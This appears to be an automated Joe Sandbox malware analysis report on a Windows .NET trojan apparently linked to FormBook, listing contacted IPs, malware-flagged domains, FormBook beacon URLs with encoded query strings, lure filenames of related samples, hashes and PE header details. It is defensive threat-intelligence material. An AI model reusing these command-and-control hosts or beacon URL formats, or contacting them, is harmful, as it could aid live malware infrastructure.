http://www.tcbbuilds.com	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.fontbureau.com/designers?	881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.pacersun.com/4hc5/www.showshoe.info	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.therealnikib.comReferer:	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.comcember	explorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://img.sedoparking.com	explorer.exe, 00000003.00000002.4103832201.000000001177F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmp	false		high
http://www.tiro.com	881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.candicrem.com/4hc5/www.therenixgroupllc.com	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.goodfont.co.kr	881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.vurporn.comReferer:	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000003.00000000.1650112973.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1652947131.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4093617722.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.quailrun-inc.com/4hc5/www.bollywood.nexus	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.galapagosdesign.com/staff/dennis.htm	881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.quailrun-inc.comReferer:	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
34.68.234.4	flash.funnels.msgsndr.com	United States	15169	GOOGLEUS	false
154.205.127.201	www.iqixuehe.com	Seychelles	8100	ASN-QUADRANET-GLOBALUS	true
45.64.97.60	slotjitu88.website	Indonesia	135360	ARGONDATANETWORK-AS-APArgonDataNetworkID	true
154.86.64.96	www.7141999.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	true
103.120.80.111	www.lpqxmz.site	Hong Kong	139021	WEST263GO-HKWest263InternationalLimitedHK	true
167.172.228.26	pacersun.com	United States	14061	DIGITALOCEAN-ASNUS	true
3.64.163.50	www.bollywood.nexus	United States	16509	AMAZON-02US	true
199.34.228.191	www.candicrem.com	United States	27647	WEEBLYUS	true
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false
13.32.208.72	d3at2k7gv5wser.cloudfront.net	United States	16509	AMAZON-02US	false

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1332500
Start date and time:	2023-10-26 09:45:50 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	881SP1exr1.exe renamed because original name is a hash value
Original Sample Name:	fc8b3a3005cdc80ce19af33a57010fa8.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@173/1@11/10
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 121 Number of non-executed functions: 286
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:46:37	API Interceptor	1x Sleep call for process: 881SP1exr1.exe modified
09:46:45	API Interceptor	7741663x Sleep call for process: explorer.exe modified
09:47:22	API Interceptor	8111947x Sleep call for process: chkdsk.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
154.205.127.201	TT_PAYMENT_SLIP_23AUG2023.doc	Get hash	malicious	FormBook	Browse	www.iqixuehe.com/4hc5/?Cxl0M=YN64Xx&wL3dPBV0=+hA7uXL5/FL3GoFrrh1HMOS2s85bj4EjFJ9ovq6HPQt8uRBOeiVqbKjmcAGKz/YpQyFf2g==
	3Fip115gvy.exe	Get hash	malicious	FormBook	Browse	www.iqixuehe.com/4hc5/?1bYL=+hA7uXKNj1KDb4QY1R1HMOS2s85bj4EjFJl4zpmGLwt9ugtIZyEmNObkfmGMreAhcEx+ve05DA==&5j=tFNxItah5B1Ppp8
	qSvGwvVvxr.exe	Get hash	malicious	FormBook	Browse	www.iqixuehe.com/4hc5/?NvWXFX=+hA7uXKNj1KDb4QY1R1HMOS2s85bj4EjFJl4zpmGLwt9ugtIZyEmNObkflqTzucafzMi&00G=kjNDztR8m
	fmCMRF012p.exe	Get hash	malicious	FormBook	Browse	www.iqixuehe.com/4hc5/?W0D=+hA7uXL8/CLzG4Jnph1HMOS2s85bj4EjFJl4zpmGLwt9ugtIZyEmNObkfmGMreAhcEx+ve05DA==&5jRt=F0GLWN9hgdxlI
	New_order_24-07-23.doc	Get hash	malicious	FormBook	Browse	www.iqixuehe.com/4hc5/?-Z=5j_Pp62&A2M=+hA7uXL5/FL3GoFrrh1HMOS2s85bj4EjFJ9ovq6HPQt8uRBOeiVqbKjmcAGKz/YpQyFf2g==
45.64.97.60	TT_PAYMENT_SLIP_23AUG2023.doc	Get hash	malicious	FormBook	Browse	www.slotjitu88.website/4hc5/?wL3dPBV0=Td1U1SjQIKZbCXUcgTsqgzapHPyB/huuK+VwOHrCNge/Oj16i4nV3pxuuBknbP1oecIYkA==&Cxl0M=YN64Xx
	3Fip115gvy.exe	Get hash	malicious	FormBook	Browse	www.slotjitu88.website/4hc5/?5j=tFNxItah5B1Ppp8&1bYL=Td1U1SikU6YvfHBv+jsqgzapHPyB/huuK+NgSE3DJAe+OSZ8lo2ZhtJstnkhDutgSq859wjHrQ==
	BRq2dpdCAO.exe	Get hash	malicious	FormBook	Browse	www.slotjitu88.website/4hc5/?w6=Td1U1SjVINZfCHYQiTsqgzapHPyB/huuK+NgSE3DJAe+OSZ8lo2ZhtJstkIxffxbVfVo&Ttxp=9rkXPtix_
154.86.64.96	qSvGwvVvxr.exe	Get hash	malicious	FormBook	Browse	www.7141999.com/4hc5/?NvWXFX=sJ+Ygj2boS23IGP4VOQMiTEgoYfBBcQbem66ypT0eUfc0EimMlq1mWlKocP0JHC/b4ap&00G=kjNDztR8m
103.120.80.111	TT_PAYMENT_SLIP_23AUG2023.doc	Get hash	malicious	FormBook	Browse	www.lpqxmz.site/4hc5/?wL3dPBV0=245SFh9gT8/q7yEoAZq1WQwUtHwLu6OXJLFZ/z0wkaCEnMe+MUwOEv69lJW52EKzavqGKA==&Cxl0M=YN64Xx
103.120.80.111	Factura de proforma .pdf.exe	Get hash	malicious	FormBook	Browse	www.usmmexchange.com/de19/?AL38nB7p=QcprsbHu9MQk172D5vQ9WbPHu6lwPYsevWv7v2Hj6r4iMS50JmV5cqztJSVvguJbPvSU&6lrx=5jth78
167.172.228.26	DHL_Expess_Shipping_Documents_pdf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.myeuropesmartmove.com/s9u3/?oBE=ThyDKBHxl0&jV=OjA8dTMnpFvBKvJoDTxtDw/AoQoVvyDgtxNMuA93Q0r2dVORMB00vBfczNOhWe9sg6ZcS//EwMluuCbnYsyL4kYsJru6G2WdXA==
	FedEx_AWB#501209127413.exe	Get hash	malicious	FormBook	Browse	www.myeuropesmartmove.com/tphs/
	3RJv63AEc5.rtf	Get hash	malicious	Unknown	Browse	www.noobblaster.com/qbru/?MFgP_=JwUQbw9gdYZct0LJE7cQmaqkr3NW5p4oJl17WXJ+AFRyfT4sHnCJTE/q+g/8FXC2UPAGWJVVrTRCX1TQonP+VR+Uhh19tyUYYPxwnQA=&x2=udVPKH
	RFQ.doc	Get hash	malicious	Unknown	Browse	www.noobblaster.com/qbru/?ynq=JwUQbw9gdYZct0LJE7cQmaqkr3NW5p4oJl17WXJ+AFRyfT4sHnCJTE/q+g/8FXC2UPAGWJVVrTRCX1TQonP+VR+Uhh19tyUYYPxwnQA=&Z2I=9LPl
	AWB_#191023.doc	Get hash	malicious	Unknown	Browse	www.noobblaster.com/qbru/?NdR8lz=JwUQbw9gdYZct0LJE7cQmaqkr3NW5p4oJl17WXJ+AFRyfT4sHnCJTE/q+g/8FXC2UPAGWJVVrTRCX1TQonP+VR+Uhh19tyUYYPxwnQA=&iBO=-XVx_p2X1d
	TotalXTunisiaXRFQ.docx.doc	Get hash	malicious	Unknown	Browse	www.noobblaster.com/qbru/?vhM=JwUQbw9gdYZct0LJE7cQmaqkr3NW5p4oJl17WXJ+AFRyfT4sHnCJTE/q+g/8FXC2UPAGWJVVrTRCX1TQonP+VR+Uhh19tyUYYPxwnQA=&xf=zVtXZTC0WR2XXd
	7c912KO5XC.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.zhperviepixie.com/sy22/?Dxoxs=hdFL0kw119WJTNhykMkXOvLbydzGG5NDjXDbBbflEf+ywlprp6w0OIUX+XUFdJQRTkt9&lnzt=UlYpkFa
	19.10.2023_Tarihli_#U0130#U015flem_Dekontu.exe	Get hash	malicious	Unknown	Browse	www.nexgen-gaming.com/fgkz/?B6npQ=O8V8yF7x&LpdH=L1TZCS35bu0vOYHNzZCPIdU0sWDhLvNiLfum3bQ18rX1WKbURfbupmyOYdxIRu4IbjlY68Wfuxyw3QRU1unTAz21VWrMWPgd6w==
	18.10.2023_Tarihli_#U0130#U015flem_Dekontu.exe	Get hash	malicious	Unknown	Browse	www.nexgen-gaming.com/fgkz/?m0v4zfJ=L1TZCS35bu0vOYHNzZCPIdU0sWDhLvNiLfum3bQ18rX1WKbURfbupmyOYdxIRu4IbjlY68Wfuxyw3QRU1unTWSSreFz3RroZ7g==&rFOH=HFl0
	PO#_34798450.xls	Get hash	malicious	FormBook, NSISDropper	Browse	www.zhperviepixie.com/sy22/?wBT4W2=GzuD&LR-4=hdFL0kw1ptSNTtp1mMkXOvLbydzGG5NDjXbLdYDkA/+zwUFtuqh4YMsV9y45Gpkicl4Nrw==
	SecuriteInfo.com.Win32.PWSX-gen.13397.19541.exe	Get hash	malicious	Unknown	Browse	www.noobblaster.com/8hbu/?QRqdvJ=ONOt39nuwXTLYijxOhKkoURkOresMAdmzNibNY+7ziiCKPjY83ABD3J/YcUMMvBtNEW8rCVQNCq7JfxayIEvOcPAuExfajQRojAMGkPyPNDL&Mfxt=Xjktc0pP
	Advance_payment.doc	Get hash	malicious	FormBook	Browse	www.pacersun.com/4hc5/?MDK0Xf=YIoXQxIASBO+HkPGKjyMxPOX2glibAcKMSjczB161rT6EVSl/y3mC7wnA9amsA1Z+Z1rlQ==&pBW=Hr50U
	OwX3rXBIQT.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.molinoelvinculo.com/t6tg/?uZgh=TwH5KjSGroKvUUWoxYzXHYwPD1oBa+OlgcJKmgmA3lj472alkfYiVIja1wX5BJ9Ern3j&9rUD=GbPHmDXXvv
	Cari_Hesap_Ekstresi_100923.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.firstenergyconp.com/k13s/?El8lbnT=NPYhA1EkrjnWcxuD/cD9gJpXlbyf/3lXmEOriJ3YQjHnbmL4rCdqy7atBPOMdn4vtJMZ&Exlh-=UBZtmXO
	SecuriteInfo.com.Gen.Variant.Nemesis.1781.26240.30029.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.zhperviepixie.com/sy22/?LhBD=hdFL0kw119WJTNhykMkXOvLbydzGG5NDjXDbBbflEf+ywlprp6w0OIUX+XUFdJQRTkt9&WPg8=DheD
	SecuriteInfo.com.Win32.AdwareX-gen.18525.27375.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.zhperviepixie.com/sy22/?5j=hdFL0kwwpqSJT9l5kMkXOvLbydzGG5NDjXDbBbflEf+ywlprp6w0OIUX+XUvC5gRXml9&uVa4F=LHQT
	Dekont.pdf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.xpcslda.com/mh21/?EBZ=ZTLp_z4xh2a&YTfdpdO=C7miqzTEybANCzVKZPJwh2vXRECiGGtlnjv/1hfZr84fhwDaQOR6TLtNsfm/Z1g5WI5Sqs0GDw==
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.22769.14377.rtf	Get hash	malicious	FormBook, NSISDropper	Browse	www.batcavela.com/ge06/?YdOTPj=Q330NlraA7tYaKeRYSC7JMUzln/+sA0fy8mpHysJLBlsNI2WRIrp3xyNDPmP0TzmXGyyvQ==&Mrm8=jxod-tahmn98k
	SWIFT_4939459845845.xls	Get hash	malicious	FormBook, NSISDropper	Browse	www.zhperviepixie.com/sy22/?yVO4Zr3P=hdFL0kw1ptSNTtp1mMkXOvLbydzGG5NDjXbLdYDkA/+zwUFtuqh4YMsV9y45Gpkicl4Nrw==&ebF=6ldl7bM
	xzc3_pdf.exe	Get hash	malicious	FormBook	Browse	www.polskiradio.com/g11y/?wh=pWgF+hDe5T1VQJEgc6/6b4BZ1fum8Q2gQQ0ZMaCvxv9gUMSKVKuPosMH/PVMVORc/IAd&F8=BZFhLR

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
parkingpage.namecheap.com	PO_4501283529.xls	Get hash	malicious	FormBook	Browse	91.195.240.19
	PO_4501289523.xls	Get hash	malicious	FormBook	Browse	91.195.240.19
	TT_PAYMENT_SLIP_23AUG2023.doc	Get hash	malicious	FormBook	Browse	91.195.240.19
	Bhl9bymdkI.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	JPG-68376878978-SSG_TENDER_REQUEST.JPG.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	SecuriteInfo.com.Win32.CrypterX-gen.18668.4514.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	PDHuQXhoUB.exe	Get hash	malicious	Unknown	Browse	91.195.240.19
	PDHuQXhoUB.exe	Get hash	malicious	Unknown	Browse	91.195.240.19
	3RJv63AEc5.rtf	Get hash	malicious	Unknown	Browse	91.195.240.19
	Documentaci#U00f3n_Solicitada.PDF.exe	Get hash	malicious	NSISDropper	Browse	91.195.240.19
	RFQ.doc	Get hash	malicious	Unknown	Browse	91.195.240.19
	AWB_#191023.doc	Get hash	malicious	Unknown	Browse	91.195.240.19
	TotalXTunisiaXRFQ.docx.doc	Get hash	malicious	Unknown	Browse	91.195.240.19
	PI_and_payment_confirmed_pdf.exe	Get hash	malicious	FormBook, DBatLoader	Browse	91.195.240.19
	PO-AM2307586.doc	Get hash	malicious	FormBook, NSISDropper	Browse	91.195.240.19
	Audit_Confirmation_pdf.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	Overdue_payment_settled.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	SWIFT_LETTER_A1OzGLOB0NH2.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	doc_Quanon_62_10-6_pdf.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	Purchase_order.exe	Get hash	malicious	Unknown	Browse	91.195.240.19
www.7141999.com	qSvGwvVvxr.exe	Get hash	malicious	FormBook	Browse	154.86.64.96

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ARGONDATANETWORK-AS-APArgonDataNetworkID	TT_PAYMENT_SLIP_23AUG2023.doc	Get hash	malicious	FormBook	Browse	45.64.97.60
	3Fip115gvy.exe	Get hash	malicious	FormBook	Browse	45.64.97.60
	BRq2dpdCAO.exe	Get hash	malicious	FormBook	Browse	45.64.97.60
ASN-QUADRANET-GLOBALUS	proforma_Invoice.exe	Get hash	malicious	Remcos, DBatLoader	Browse	104.223.35.34
	#U00f6deme_talimat#U0131.exe	Get hash	malicious	FormBook	Browse	104.247.167.3
	https://www.vdtwv.site/login	Get hash	malicious	Unknown	Browse	204.44.75.204
	https://www.ctahjvf.cn/login	Get hash	malicious	Unknown	Browse	204.44.75.204
	6TZ8OukfGU.elf	Get hash	malicious	Mirai	Browse	23.153.78.205
	ZpyyEEuSFW.elf	Get hash	malicious	Mirai	Browse	69.12.93.108
	https://www.mzdjn.site/login	Get hash	malicious	Unknown	Browse	204.44.75.204
	https://www.bkajriy.cn/login	Get hash	malicious	Unknown	Browse	204.44.94.195
	1b2bfebd6093d8d95a03b4f732f89903ae6f828b292ab5765d0091b1.js	Get hash	malicious	Unknown	Browse	185.174.101.224
	1b2bfebd6093d8d95a03b4f732f89903ae6f828b292ab5765d0091b1.js	Get hash	malicious	Unknown	Browse	185.174.101.224
	TT_PAYMENT_SLIP_23AUG2023.doc	Get hash	malicious	FormBook	Browse	154.205.127.201
	SHIPPING_DOCUMENTS.exe	Get hash	malicious	AgentTesla	Browse	64.188.2.244
	https://viewsnet.gafamulticonsultants.com/	Get hash	malicious	Unknown	Browse	155.94.163.2
	https://jp.aeon.login.zxxw1tr.asia/	Get hash	malicious	Unknown	Browse	155.94.128.177
	https://www.rekuten-co.websitefly.com/rms/client/LO0101001.php	Get hash	malicious	Unknown	Browse	192.161.56.6
	https://www.rekuten-co.villypharmacy.com/rms/client/LO0101001.php	Get hash	malicious	Unknown	Browse	192.161.56.6
	https://viewsnet.helenstockings.com/	Get hash	malicious	Unknown	Browse	155.94.163.2
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Xmrig	Browse	45.61.160.199
	3ff3e11128ead9eca87a33ac9bc9453cb8450212c0a00.exe	Get hash	malicious	Glupteba, LummaC Stealer, Xmrig	Browse	45.61.160.199
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Xmrig	Browse	45.61.160.199
POWERLINE-AS-APPOWERLINEDATACENTERHK	scorp.arm.elf	Get hash	malicious	Mirai	Browse	45.202.220.122
	ZpyyEEuSFW.elf	Get hash	malicious	Mirai	Browse	160.124.107.205
	PQY6fcmo1i.elf	Get hash	malicious	Mirai	Browse	156.242.206.34
	Scan-00000090-4708948.IMG.exe	Get hash	malicious	FormBook	Browse	45.115.127.35
	4xoQYcDD9b.elf	Get hash	malicious	Mirai	Browse	154.216.83.104
	rYAJAFi7do.elf	Get hash	malicious	Mirai	Browse	154.218.213.165
	BOQ-_AE200073490.exe	Get hash	malicious	FormBook	Browse	160.124.8.40
	wuka9aK727.elf	Get hash	malicious	Mirai	Browse	156.250.157.108
	http://4576cjdgaj786eugtdeuatda.z6.web.core.windows.net	Get hash	malicious	Unknown	Browse	154.201.164.184
	Order_List.doc	Get hash	malicious	FormBook, NSISDropper	Browse	192.151.227.109
	qSvGwvVvxr.exe	Get hash	malicious	FormBook	Browse	154.86.64.96
	skid.x86-20231016-0000.elf	Get hash	malicious	Unknown	Browse	156.243.244.201
	skid.arm-20231016-0000.elf	Get hash	malicious	Unknown	Browse	156.253.238.123
	vrfjUe0alF.elf	Get hash	malicious	Mirai	Browse	156.242.206.17
	6lW2MrIQsG.elf	Get hash	malicious	Mirai	Browse	156.251.7.183
	1HytjdgXc2.elf	Get hash	malicious	Mirai	Browse	156.242.255.21
	x7RlIzQDk1.exe	Get hash	malicious	Unknown	Browse	154.201.225.123
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.9100.16087.rtf	Get hash	malicious	FormBook	Browse	154.215.96.241
	skid.arm-20231012-0350.elf	Get hash	malicious	Mirai	Browse	156.244.244.94
	skid.x86-20231012-0350.elf	Get hash	malicious	Mirai	Browse	156.244.244.93

Process:	C:\Users\user\Desktop\881SP1exr1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.906705476168155
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	881SP1exr1.exe
File size:	582'656 bytes
MD5:	fc8b3a3005cdc80ce19af33a57010fa8
SHA1:	b3303ebe7263a55a61e80407706711ca0727e496
SHA256:	66e461f8245be149d5a3826d29c170d5960ade477be127c0fe2bc315e26067a3
SHA512:	7486f49127aa27c5369361d34d754d95970e653266e4a507d6fa1874d9235d4aeda9f6424ad1dfa1e68c9e2d961a6ce5088ab38ed241c19ecb0ff457d3222ad0
SSDEEP:	12288:yG1tsT0hAbk1Y3qHBTsyyrHJLm3nI8UB6a2Si:D10YAoKgTTyr43
TLSH:	16C4120037F8A326E6FA1FF9D8B5A0514F39762A7875D24C1E9E50EF09A2F04C451B2B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<.T...............0.............".... ........@.. .......................@............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x48f822
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x8254FD3C [Sat Apr 16 23:05:32 2039 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
